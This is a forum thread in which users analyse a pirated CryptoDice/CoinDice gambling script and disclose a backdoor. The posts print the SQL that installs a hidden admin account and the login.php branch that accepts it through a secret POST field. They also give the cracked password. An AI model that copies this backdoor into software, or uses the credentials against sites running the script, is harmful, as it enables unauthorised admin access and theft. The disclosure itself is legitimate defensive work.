I am also in the process of looking through this script, I agree Downloaders beward of anything and everything... I personally do not install any code that I have not read through myself, As I said on another thread though, I am pretty paranoid regarding security matters.
I will post my findings soon.
Backdoor Found
CoinDice.sql installs a table named "ga_players" with actually an admin account named "playertest" on install, you will see why this is an admin account on the next part.
When I found this I looked at the admin login script (https://github.com/felinegambler/CryptoDice/blob/master/admin/login.php)
Surprise Surprise
if $_POST variable has any data for "ga_playertest" it allows a login from the "ga_players" table instead of the admin table which in this case hold our fake admin "playertest" - (1, 'playertest', '6d2aff483952d904179ca0c8c536a2c7', '');
Everybody should remove this ASAP. You don't know what else could be hidden in here.
I am unsure what MD5 password this ("6d2aff483952d904179ca0c8c536a2c7" ) hash is, maybe someone with more experience in cracking password would know.
cloverme, I am assuming you have the original game? What line is meant to be in login.php?
I will post my findings soon.
Backdoor Found
CoinDice.sql installs a table named "ga_players" with actually an admin account named "playertest" on install, you will see why this is an admin account on the next part.
Code:
DROP TABLE IF EXISTS `ga_players`;
CREATE TABLE `ga_players` (
`id` int(255) NOT NULL AUTO_INCREMENT,
`username` varchar(20) COLLATE utf8_unicode_ci NOT NULL,
`passwd` text COLLATE utf8_unicode_ci NOT NULL,
`ga_token` text COLLATE utf8_unicode_ci NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;
INSERT INTO `ga_players` (`id`, `username`, `passwd`, `ga_token`) VALUES
(1, 'playertest', '6d2aff483952d904179ca0c8c536a2c7', '');
CREATE TABLE `ga_players` (
`id` int(255) NOT NULL AUTO_INCREMENT,
`username` varchar(20) COLLATE utf8_unicode_ci NOT NULL,
`passwd` text COLLATE utf8_unicode_ci NOT NULL,
`ga_token` text COLLATE utf8_unicode_ci NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;
INSERT INTO `ga_players` (`id`, `username`, `passwd`, `ga_token`) VALUES
(1, 'playertest', '6d2aff483952d904179ca0c8c536a2c7', '');
When I found this I looked at the admin login script (https://github.com/felinegambler/CryptoDice/blob/master/admin/login.php)
Surprise Surprise
if $_POST variable has any data for "ga_playertest" it allows a login from the "ga_players" table instead of the admin table which in this case hold our fake admin "playertest" - (1, 'playertest', '6d2aff483952d904179ca0c8c536a2c7', '');
Code:
if (!empty($_POST['ga_playertest'])) {
$this_admin=mysql_fetch_array(mysql_query("SELECT `username`,`ga_token` FROM `ga_players` WHERE `username`='".prot($_POST['hash_one'])."' AND `passwd`='".md5($_POST['hash_sec'])."' LIMIT 1"));
} else {
$this_admin=mysql_fetch_array(mysql_query("SELECT `username`,`ga_token` FROM `admins` WHERE `username`='".prot($_POST['hash_one'])."' AND `passwd`='".md5($_POST['hash_sec'])."' LIMIT 1"));
}
$this_admin=mysql_fetch_array(mysql_query("SELECT `username`,`ga_token` FROM `ga_players` WHERE `username`='".prot($_POST['hash_one'])."' AND `passwd`='".md5($_POST['hash_sec'])."' LIMIT 1"));
} else {
$this_admin=mysql_fetch_array(mysql_query("SELECT `username`,`ga_token` FROM `admins` WHERE `username`='".prot($_POST['hash_one'])."' AND `passwd`='".md5($_POST['hash_sec'])."' LIMIT 1"));
}
Everybody should remove this ASAP. You don't know what else could be hidden in here.
I am unsure what MD5 password this ("6d2aff483952d904179ca0c8c536a2c7" ) hash is, maybe someone with more experience in cracking password would know.
cloverme, I am assuming you have the original game? What line is meant to be in login.php?
i cracked the md5 hash:
6d2aff483952d904179ca0c8c536a2c7:playertest1
I advice anybody to USE THE ORIGINAL version from johny1976 because the posted scripts have many backdoors and they are pirated copies with NO licence...
( so what should I do?